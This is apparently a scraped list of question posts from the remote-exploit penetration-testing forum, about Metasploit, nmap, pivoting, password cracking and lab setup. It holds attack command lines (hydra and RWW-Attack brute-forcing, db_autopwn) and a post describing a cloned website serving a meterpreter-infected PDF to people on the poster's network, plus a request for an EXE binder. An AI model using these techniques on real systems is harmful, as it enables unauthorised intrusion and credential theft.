-
-
22:10
»
remote-exploit
Hello all,
My management has approved an audit of AD accounts looking for weak passwords
Since I have the server and backups I would have access to NTDS.DIT file, is there away to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.
I've searched high and low and have not been able to find an answer.
-
-
19:56
»
remote-exploit
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server thru, i have exploited the FTP server, scanned internally, found some hosts. Setup a pivot through the FTP server and exploited a host, this host has a second NIC and another host behind it. I have setup another route through the host but i cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
-
19:56
»
remote-exploit
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server thru, i have exploited the FTP server, scanned internally, found some hosts. Setup a pivot through the FTP server and exploited a host, this host has a second NIC and another host behind it. I have setup another route through the host but i cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
-
-
13:06
»
remote-exploit
Suppose you wanted to fool OS fingerprinting tools such as xprobe, nmap, etc. in order to make the initial information gathering phase harder.
In BSD you can set net.inet.udp.blackhole or even better, use pf's traffic normalization options.
Even the Windows world has seen a few tools to make your win* box appear as running a different OS.
In Linux, on the other hand, we had IPpersonality (ippersonality.sourceforge.net), iplog (ojnk.sourceforge.net) and morph (synacklabs.net) but they're now quite old and only work with 2.4 kernels.
So I was wondering if any of you can suggest alternatives? pf for linux anyone? :rolleyes:
-
-
15:00
»
remote-exploit
As the title states - does anyone have recommendations on a good EXE-binder?
-
-
15:25
»
remote-exploit
hi
I Hope this is the right place to ask this.
When I use Metasploit its work very good on my local network
but when i want to pentest out of my local it doesnt work:confused:
can some one tell me why?
-
10:56
»
remote-exploit
First let me say, yes I know this isn't a nmap support forum and that if nobody here knows the answer to my question I will go ask on a nmap mailing list or something.
To the point. I'm wondering if anyone knows the scope of NMAP NSE scripts? Are they always associated with a port or are there host level NSEs as well. Think of this from the perspective of parsing NMAP XML output.
Personally I've only seen NSE output related to a port but that doesn't meant that there isn't a host level NSE output that I just haven't managed to trigger yet.
Edit: Yes I know I typo'd the subject line :(
-
-
13:04
»
remote-exploit
I was recently asked a question about ODBC connections to a SQL server and the possibility of MITM or sniffing attacks. Can someone point me to something that discusses this? I've had a hard time finding much about it, hopefully someone here can dump some knowledge.
Thanks,
C
-
-
8:27
»
remote-exploit
Hi !
I am running BT4 and i got Nessus and Nexpose installed for vulnerability scanning.
I also have a XP VMWare running with a few "exploitable" protocols/software.
I followed a "tutorial" from offensive-security.
The machine is vulnerable to a well known Netbios exploit.
If i do a
Code: db_nmap 192.168.123.x scan on the machine, followed by a simple yet powerful
Code: db_autopwn -p -e i get a meterpreter session.
So far so good.
If i do scans with nessus or nexpose, both show me the high risk and possible exploit. So i was going to use nexpose and the nessus scan result within metasploit.
I followed the tutorial linked above and the quick starter guide at nexpose, using the nexpose plugin within metasploit.
But on both situations i dont get the exploits listed. They dont find any matching exploits.
Anyone got a idea what i did wrong ? Maybe there is something i forgot.
Ah forgot to say:
db_vulns shows the exploits that nexpose found, but db_autopwn -x -t doesnt show any and also doesnt run exploits against the machine.
-
6:48
»
remote-exploit
This may be considered a stupid question and end up in the idiots corner, but I'll take my chances. I am trying to automate an attack, with perl. I use a system call to msfcli for the exploit, after checking that the port is open. I need to have another function run if the exploit did not fail. Where can I find some documentation for the return values from msfcli. I am not much of a programmer. The usual noob answer of google search has proven fruitless.
-
-
10:24
»
remote-exploit
Hope this is the right place to ask this.
I have 3 computers on my subnet, a laptop running windows xp with all latest updates and ZoneAlarm firewall.
Another PC running windows xp sp2 with zoneAlarm firewall.
And an asus netbook running ubuntu.
Now, when running Nmap on my subnet I've encountered 2 problems:
1.I can't get any signal from my first laptop running (updated) win xp. I've disabled pinging (PN) and still nothing. I tried scanning the specific IP (also designated port 80) and still no result. Any idea how can I find this station with nmap ?
2.When scanning my subnet I found that my router has an open port for a printer. I must say that I definitely didn't open any port on the router, plus when I looked where to disable this option on the router (from the browser GUI) I found nothing regarding any printers.
Any help would be welcomed.
Guy.
-
-
1:14
»
remote-exploit
This is my first post and i having problem with crunch password generator.
My problem:
I have tried to create password list with crunch.
The command was: Quote:
|
./crunch 1 8 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
|
It is creating for long time. After created the list sudden back track signal you are using low disk and 0 free space.
when i properties the wordlist.txt then i saw 69 gb. But my hard disk only 80 gb.
MY QUESTION:. Is it possible to generate 100mg-10gb password list?
if it is possible then how.
thanks to all
-
-
13:40
»
remote-exploit
Hey everyone!
First off I wanted to take a second and introduce myself, I just turned 21, working for IBM and going to school. Ive been brought up around computers and have always loved em. Im familiar with programming in PHP, SQL, HTML, C, C++, VB. Through about the last year, year and a half (since I first stumbled upon backtrack), I've grown to have a very strong interest in penetration testing, computer security, etc. Im looking to focus on learning more about it and getting certified in school.
As far as school, certificates, degrees, etc, I feel confused as to what people, companies, are looking for, what qualifications are generally accepted nad used across the board? What are the best ways to go about getting these certificates and degrees?
In order to grow more in my knowledge of systems, Ive decided to start to put together my first 'powerful' machine at home, so far Ive purchased:
ASUS P6T Deluxe V2 LGA 1366 Intel X58 ATX Intel Motherboard
newegg/Product/Product.aspx?Item=N82E16813131365]Newegg.com - ASUS P6T Deluxe V2 LGA 1366 Intel X58 ATX Intel Motherboard - Intel Motherboards
Intel Core i7-920 Bloomfield 2.66GHz 4 x 256KB L2 Cache 8MB L3 Cache LGA 1366 130W Quad-Core Processor
newegg/product/product.aspx?Item=N82E16819115202]Newegg.com - Intel Core i7-920 Bloomfield 2.66GHz 4 x 256KB L2 Cache 8MB L3 Cache LGA 1366 130W Quad-Core Processor - Processors - Desktops
CORSAIR CMPSU-750TX 750W ATX12V / EPS12V SLI Ready CrossFire Ready 80 PLUS Certified Active PFC Compatible with Core i7 Power Supply
newegg/Product/Product.aspx?Item=N82E16817139006]Newegg.com - CORSAIR CMPSU-750TX 750W ATX12V / EPS12V SLI Ready CrossFire Ready 80 PLUS Certified Active PFC Compatible with Core i7 Power Supply - Power Supplies
I still need to get graphics card as well as Hard drives and RAM.
My idea is to make the systme multiple boot, thinking Windows XP, Windows 7, and backtrack. Within each OS I was going to run VMware Server, and then Id have multiple VMs of different operating systems, that way I can boot into whatever primary os, and then run vmwares of wahtever os to use for attacking into.
I was wondering though, is this type of environment practical? Is there an amount of RAM you guys suggest? I specific type of Graphics card? Im not planning on playing games or anything, strictly using this for pen testing education and work, I was thinking of getting a beefy graphics card so I can generate rainbow tables and such faster, but how well will my processor be able to do that? How much should I spend on a good card? Im hoping to be able to run and try anythign and everything, from wireless security, to operating system vulnerabilities, etc. I've also heard of different vmwares that are setup strictly for attacking, are there any that you all have found to be more beneficial than others?
If theres any advice or questions you guys have for me, feel free to send any information my way.
-
-
23:02
»
remote-exploit
Without using windows update.
Thanks.
-
-
19:23
»
remote-exploit
would just like to know what geforce graphics card (and maybe processor) people are using and how many keys per second they are reaching with pyrit and cuda for the hashes.
i only have a 8400gt and dual-core pentium D 3ghz and reaching speeds of upto 700p/s
i have my eye on a shiny new GTX 260. If only i could afford 2 as my mobo has SLI capability. That WOULD be interesting.
-
12:24
»
remote-exploit
Hi folks,
Many of you know how important is the analysis and planning of the targeted environment before the attempt of a successful penetration test.
I got the idea, and I am trying to draw the network design in order to visualize things better. Many tools can be used to do that, I used hping3 as it comes with BT4, others include tcptraceroute, firewalk-5.0 (discontinued by developers...), etc.
What in fact is done by the program (hping3) is TCP/IP packet injection (with the SYN bit enabled) hop-by-hop until it reaches the final host (destination).
By sniffing the traffic, I could determine the TTL of the various responding hosts within the path until my packet "got there".
As far as I know the default behavior of a network would be to decrement the TTL of a device as long as I go deeper on the network (meaning that I am getting closer the targetet IP). Like, for example, in a network with 3 devices (routers) before my targetet IP it would be something like this:
Quote:
123.123.123.122 TTL 255 (my gateway)
123.123.123.133 TTL 254
123.123.123.144 TTL 253
177.177.177.177 TTL 124 (target IP)
|
Demonstrating that the host is Windows based (TTL starts at 128) and is placed 4 hops from me.
What I know by the notice though, is that sometimes the TTL increases. Likewise:
Quote:
123.123.123.122 TTL 255 (my gateway)
123.123.123.133 TTL 250
123.123.123.144 TTL 251
177.177.177.177 TTL 124 (target IP)
|
This is confusing, because I can't know for sure the network structure (if they are placed aside or below/above each other).
Can someone here enlighten this topic?
Thanks in advance!
sl33p
-
11:46
»
remote-exploit
i am new to this field and i got a project of pentesting a small medical house. i need a pentesting Non-disclosure agreement template so that i can be on the safe side. :(
-
-
2:14
»
remote-exploit
Hello,
is there a way to encode a PDF payload in metasploit?
if yes, how?
thanx in advance :)
-
-
22:24
»
remote-exploit
I have been testing hydra on my Belkin router with the code: hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -s -vV 192.168.1.1
[http-get] /
I am trying the username admin because none is used; but I have tried many with the same results.
The results tell me a valid pair has been found and that the password is blank. This is the default for my router but I have changed the password and verified that it in fact works. Using the blank field as a password fails. Not sure what the issue is here with hydra or possibly my misuse of it.
-
-
8:16
»
remote-exploit
-
4:20
»
remote-exploit
I am really new to sniffing. My problem:
When i try to arppoisoning then it is not work. The out put ARP poisoning does not support this media.
But when i tried direct sniff it worked fine. But i need to sniff my target/victim ip.
My internet interface ppp0
how to use it?
I love back track.
thank you
-
-
23:25
»
remote-exploit
Hey guys Im a little new to backtrack and am going to do some pen testing on my local network using social engineering if I cant find any vulnerabilities.
So what I have done so far is made a webserver that looks like another website that people on my network visit often. Then I have edited one of the links to open a .pdf that is infected with the reverse_tcp meterpreter payload.
So basiclly is what I am wanting to do is since im not going to sit at my pc waiting for the people on my network to open it so I can quickly migrate to another process so I dont lose my session when they close the site. So I want to write a script so that when I have the handler started and when they open the pdf and the meterpreter session is opened that it will automaticly run the migrate.rb script inside meterpreter with out me being there to do it so that It will keep the session until I get there or until they shut the computer down. I want a some one to write a script for me and then a tutorial on how it works so I can learn how to replicate it and make similar scripts in the future.
-
-
6:12
»
remote-exploit
could someone please clarify what nw mode i should use within vmware for the following scenario
I have my de-ice vm images (and other vulnerable hosts) etc on one physical machine in instances of vmware and i have backtrack vm images on another seperate pysical machine
both machines are on the one network via a wireless router and the vm images are setup in bridged mode
i can find the de-ice host however when i run an nmap scan is says all ports are filtered
the documentation i have looked at seem to be aimed at the vm images all running on the same physical machine can somebody give me the correct nw mode ie host, nat or bridged so that i can pentest the vitual hosts on one physical machine using my backtrack vm images on my other physical machine
please have pity on me with this one im full of flu and not entirely on top form at the moment. so yes in a way im being lazy and asking directly for the answer
Merry christmas and happy new year to all
Much apprecaited
-
0:25
»
remote-exploit
Hello. I made a an autoIT script that installs the two packages needed to run nmap. I compiled it into an .exe, and it works when I run it locally from the command line.
When I connect to these same machines with a meterpreter shell and drop into a system shell, the same command that worked locally does not initiate an install. Instead, the command line seems to hang. A process appears which does not go away unless killed.
Do autoIT scripts work without a windows session (ie from a console)? Does the script not work if the user is SYSTEM? Does anyone recommend an alternative scanner that is lighter and easier to upload? I know it is possible to route metasploit exploits through meterpreter sessions, but is it possible to route nmap scans through the same sessions?
Thanks in advance for your responses.
-
-
8:15
»
remote-exploit
Well I only saw one other thread about Yersinia. First let me post my switch config.
Code: Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.
Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.
Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing
Switch(config)#interface
% Incomplete command.
Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an
interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit
(MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a
receive-only
interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and
ignore global
UDLD setting
Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp
status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5
0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- ---------
--------------------------
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,
2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.
Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.
Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active
VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch# It's been a while since I worked with cisco I have computers on both vlans pinging gate way with 65500 bytes to simulate traffic. But I can not seem to be able to catch a DTP packet am I do something wrong do only certain protocols trigger a DTP and ICMP isn't one of them? Did I not configure DTP correctly on the switch? Any help is much appreciated its a catalyst 3500 XL if that helps.
-
-
15:18
»
remote-exploit
Hi,
Assume a window machine that did network scans on a specific port.
Multiple AV wear run on the machine and turned out nothing.
How would you prove/disprove that machine is infected?
Sin-cerely,
Trol
-
-
5:21
»
remote-exploit
Hi,
My friend provides a web hosting service ... his web server has been attacked and someone succeeded to deface one of the web pages. since he knows that i have been working with security since the last year he asked me to try to attack his website and to find out how the attacker sneaked into the server.
i started to gather some information about his hosting service. then i started to scan his server and i found the following:
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.69
53/tcp open domain
80/tcp open http Apache
[httpd] 2.2.14 ((Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11)
110/tcp open pop3 Courier pop3d
143/tcp open imap Courier Imapd (released 2008)
443/tcp open http Apache
[httpd] 2.2.14 ((Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11)
465/tcp open ssl/smtp Exim smtpd 4.69
993/tcp open ssl/imap Courier Imapd (released 2008)
995/tcp open ssl/pop3 Courier pop3d
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.24
i tried to find some vulnerabilities for the above ports so i searched on google, milw0rm, exploit-db, packetstorm ... but badly i couldn't find anything useful :(
i tried to check if one of the websites has a SQL Injection Vuln. but i found that all the websites haven't form to insert data. all the pages just view info no input from users.
any help !?
thanks
-
-
16:15
»
remote-exploit
I've been testing the new vnc meterpreter script hdm just wrote, as per:
Twitter / HD Moore: RunVNC: quickly spawn a V ...
It works just fine. However, it pops a courtesy shell, so I added:
Code:
set DisableCourtesyShell TRUE just before executing the exploit. The parameter was properly echoed. But the courtesy shell keeps showing.
Has anyone else tried this?
Edit. Possibly this is due it's a meterpreter script, not a payload. Just wondering if there's a command available to disable it.
-
13:09
»
remote-exploit
description of Malzilla: Malware hunting tool
hxxp://malzilla.sourceforge.net/
-
-
22:34
»
remote-exploit
Maybe a year ago I posted here about how I had added a dictionary generator to Aircrack. Since then I've had two people e-mail me asking me for the code for it...
I was thinking why would they be interested in it when they can just pipe the output of crunch into aircrack-ng?
But then I did: aircrack-ng --help
And it seems as though Aircrack doesn't have an option for reading from stdin. Is this really the case?
It wouldn't take more than half an hour to alter Aircrack so that it can read from stdin. If this is a sought-after feature then I'll alter the code myself.
By the way what program do people normally use for cracking WPA?
-
6:48
»
remote-exploit
Hey,
I'm currently testing a USB Vending Unit.
I've been looking around and I've found a good USB analyzer to record the USB data transfer between the software and the hardware, but I need to be able to play back the encounter to the device at a later date.
Is there any easy way to do this? Has anyone got any experience?
-
-
12:35
»
remote-exploit
I seem to be missing something, and need to be pointed in the right direction if you don't mind. In my lab I have a fully patched Vista and XP box and am attacking with a BT 4 box.
As they are fully patched, Metasploit attacks are a no go. Now, I am assuming that some of the software on each box is exploitable, such as firefox, and various p2p programs I have running.
Although I know what software I have installed, I don't know how an attacker would identify this. How could I find out for instance what software and version the box/user uses to surf the web or download the top 40 say?
The Vista Box:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5357/tcp open unknown
MAC Address: XXXXXXXX
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista
OS details: Microsoft Windows Vista
Network Distance: 1 hop
The XP box:
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1026/tcp open LSA-or-nterm
2869/tcp closed unknown
5214/tcp open unknown
45100/tcp open unknown
MAC Address: XXXXXXXXX
Device type: general purpose|authentication server
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (99%), Juniper Windows 2000 (90%)
Aggressive OS guesses: Microsoft Windows XP SP2 (99%), Microsoft Windows XP SP2 or SP3 (97%), Microsoft Windows 2000 SP4 or Windows XP SP2 (96%), Microsoft Windows 2003 Small Business Server (96%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows Server 2003 SP1 or SP2 (94%), Microsoft Windows XP Professional SP2 (firewall enabled) (94%), Microsoft Windows Server 2003 SP2 (94%), Microsoft Windows XP SP2 (firewall disabled) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
googling ports tells me that Limewire has 2 ports open on the XP box, which it does but how would one know which version. Also, Winamp is running on this box (shoutcast radio) but this doesn't seem to be detectable neither does port 80 traffic. How can I gather further information?
Thanks
-
-
13:38
»
remote-exploit
I am in the process of preparing labs for a university web application security course. We will be working from the Web Application Hacker's Handbook (Stuttard & Pinto). I would like the labs to be challenging and fun, but I'm unsure about a few things. I like the idea of scenario-based challenges. The WebGoat framework is great, but I don't want labs with solutions readily available. I have looked briefly into DVL, WebGoat, and the De-ICE.net live CDs. The students will be in a lab with capable machines running VMWare. While standalone challenges are good, I'm also considering bringing in an element of competition with small groups. I thought this community would be an ideal place to brainstorm. Any insights or suggestions would be greatly appreciated. Thanks!
-
-
20:36
»
remote-exploit
Hey guys,
This is my first time posting I believe. I'm a senior in highschool on my way to take network security at UAT in Tempe, AZ. I've been trying to get to know metasploit and it was a little daunting at first.
The situation is this: I have successfully exploited some of my own Win2K machines with the MS03-26 vulnerability. I have a friends permission to test on his system. I have been trying the browser_autopwn and other internet explorer exploits to no avail. I have them connect to my public IP address and my server recognizes it but always hangs on the Sending (exploit name). Then I tried it on my own computer just to check if it was an issue with his end and it still won't work.
-
-
23:18
»
remote-exploit
:)I have learned something about metasploit from offensive. But when i try to work it then at least the console output
Quote:
msf exploit(fp30reg_chunked) > exploit
[*] Creating overflow request for fp30reg.dll... [*] Refreshing the remote dllhost.exe process... [*] Trying to exploit fp30reg.dll (request 0 of 15)
[-] Exploit failed: Interrupted system call [*] Exploit completed, but no session was created.
|
The last 2 line 1. Exploit failed: Interrupted system call
2 Exploit completed, but no session was created showing problem. Is there any wrong?
-
10:26
»
remote-exploit
Hello everyone.
I am very sorry to disturb you all. I'm a French computer scientist who has gotten very interested in pen testing, but even though I have programming skills, pen testing turns out to be quite difficult for me. Yet I am more than willing to learn.
I have set up an old Apache server on an equally old Debian for educational purposes. They are supposedly filled with holes, but I still haven't managed to exploit any of them.
This is why I'm asking you experienced lot just a little help. Suggested readings, keywords to lookup on google, etc...
Here's the info I have gathered through the Information Gathering process :
Open Ports :
Port 21 (ftp). - ProFTPd 1.2.10
Port 22 (ssh). - OpenSSH_3..1p1 Debian-8.sarge.4
Port 23 (telnet). - FOXnet V03.05.0017
Port 25 (smtp). - ESMTP Exim 4.50
Port 80
[http).] - Apache/1.3.33 (Debian GNU/Linux) PHP/4.3.10-16
Port 110 (pop3). - Qpopper 4.0.5
Port 143 (imap). - dovecot
I intentionally left the phpinfo() page and a phpMyAdmin (2.6.2) control panel. I ran a Nikto and a Nessus scan. They revealed that the PHP version is really outdated and unsecure, and that there is an off-by-one buffer overflow in one of Apache's functions (still working on this one, to adapt the PoC to my version).
There is also a XSS flaw in the phpinfo() page, but social-engineering me into giving away my cookies was only fun for five minutes or so.
Thanks in advance for any advice !
-
9:24
»
remote-exploit
If you haven't already seen it, check it out:
SHODAN - Computer Search Engine
It is more or less a search engine for servers--so a search engine of banner grabs--port 80, 21, 22, 23. Very cool.
A few examples:
SHODAN - Computer Search Engine -- 2,900+ still running IIS 4.0!
SHODAN - Computer Search Engine -- 67,000 Cisco web interfaces...
Refine by country code, hostname, port, and CIDR/IP range.
Created by @achillean (
. (achillean) on Twitter), awesome tool.
-
4:58
»
remote-exploit
Hello,
when i try to test my partner web(microsoft server)host password by ./RWW.attack then it wait some time and at least out put
Quote:
@net-desktop:/pentest/passwords/rww-attack# ./RWW-Attack-0.9.2.py -t 127.0.0.1 -u /root/user -p /root/d.txt
================================================== ==================
# RWW-Attack 0.9.2 #
# coded by Bruk0ut #
# #
# bugs/comments to mikey27 ..:<-at->:.. hotmail.com #
# greetz fly out to offsec,remote-exploit,hak5 & authors of pycurl #
================================================== ==================
Disclaimer:
This program is to be used only with permission of the owner of the target host and is for use in penetration testing only. If this is not the case you must stop using this program now!
rm: cannot remove `/tmp/rww-cookies.txt': No such file or directory
Loading Users...
438 Users Loaded
Loading Passwords...
padding end of password list to make %5 for threads
Passwd list now: 70375
70375 Passwords Loaded
total passes tried: 0 total successes : 0
problem retrieving data from host... check target hostname!
|
but i am not able to understand how is it work.
I am not here for illigaly. i have full permision to check password of a host. For this reason I have posted here.
Now my ask How can i understand that it is working ?
Thank you.
-
-
20:07
»
remote-exploit
How to redirect the screen output of Metasploit Console to a file?
Thank you guys!:D
-
10:58
»
remote-exploit
hi,
i'm wondering if there is another way to get the router password instead ob bruteforing the router. So is it possible to sniff a day long traffic only on the router, so when I would log on the router from my brothers laptop that i could catch the password and username via wireshark or sth. else?
thx
-
-
17:32
»
remote-exploit
Simple question... When i scan systems that support the smb2 dialect they report back with smb 2.2 dialect and when running metasploit using the smb exploit/scanner i have several problems than before...
May this be that i am outdated ?
Is smb2 exploit patched with smb dialect 2.2 (vista,win7) ?
-
-
0:28
»
remote-exploit
The Katana: Portable Multi-Boot Security Suite is a tool which comes preconfigured with many portable security tools, including BT4pre. Katana can be found @ hackfromacave.com/katana.html. Katana includes distributions and applications which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots.
Thats right, its an octuple boot system which includes:
- Backtrack 4 pre
- the Ultimate Boot CD
- Organizational Systems Wireless Auditor (OSWA) Assistant
- the Ultimate Boot CD for Windows
- Got Root? Slax
- Ophcrack Live
- Damn Small Linux
- Damn Vulnerable Linux
This project allows you to add and remove distros fairly easily. With an option to update from BT4pre to BT4 whenever it is released. It also comes preinstalled with over 100 portable Windows applications, such as Wireshark, HiJackThis, Unstoppable Copier, Firefox, OpenOffice, The Sleuth Kit, PuTTY, and OllyDBG.
-
0:28
»
remote-exploit
The Katana: Portable Multi-Boot Security Suite is a tool which comes preconfigured with many portable security tools, including BT4pre. Katana can be found @ hackfromacave.com/katana.html. Katana includes distributions and applications which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots.
Thats right, its an octuple boot system which includes:
- Backtrack 4 pre
- the Ultimate Boot CD
- Organizational Systems Wireless Auditor (OSWA) Assistant
- the Ultimate Boot CD for Windows
- Got Root? Slax
- Ophcrack Live
- Damn Small Linux
- Damn Vulnerable Linux
This project allows you to add and remove distros fairly easily. With an option to update from BT4pre to BT4 whenever it is released. It also comes preinstalled with over 100 portable Windows applications, such as Wireshark, HiJackThis, Unstoppable Copier, Firefox, OpenOffice, The Sleuth Kit, PuTTY, and OllyDBG.
-
-
2:52
»
remote-exploit
Hi, I'm trying to workout how to do a small jump. I'm useing the opcode eb, and would like jump 10 instruction.
do I have to add a offset or linear number in frount or behind it?
-
-
8:31
»
remote-exploit
Folks,
On gentoo, ubuntu, ( that I tested ) when I run john --users=root shadow
No password hashes loaded
I tried too unshadow /etc/passwd /etc/shadow > mypwd
the same message
In present day it still works ?
Thanks in advanced
-
-
9:07
»
remote-exploit
My private IP address scheme is in 192.168.1.x subnet, Here is my network diagram
Quote:
DSL-Modem (192.168.1.1)
|
|
Switch
|
My-PC (192.168.1.x)
and a voip phone (192.168.1.x)
